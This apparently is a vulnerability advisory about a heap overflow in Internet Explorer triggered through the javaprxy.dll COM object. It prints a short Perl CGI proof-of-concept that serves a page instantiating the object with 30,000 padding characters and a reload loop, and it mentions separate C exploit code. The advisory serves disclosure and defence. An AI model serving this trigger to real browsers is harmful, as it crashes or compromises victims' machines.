|
|
Microsoft Internet Explorer Javaprxy.DLL COM Object Instantiation Heap Overflow Vulnerability
UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild. The following proof-of-concept CGI script was provided to demonstrate the vulnerability. An additional proof of concept (javaprxy.pl) is made available by FrSIRT: #!/usr/bin/perl # in order for this to work javaprxy.dll must be available on the client. my $clsid = '03D9F3F2-B0E3-11D2-B081-006008039BF0'; # javaprxy.dll my $html1 = "<html><body>\n<object classid=\"CLSID:".$clsid."\"></object>\n"; my $html2 = "\n</body><script>location.reload();</script></html>\n"; print "Content-Type: text/html;\r\n\r\n"; print $html1.("A"x30000).$html2; Exploit code javaprxy_exp.c has been provided by K.K.Senthil Velan <senthilvelan_kk@sifycorp.com>. |
|
Privacy Statement |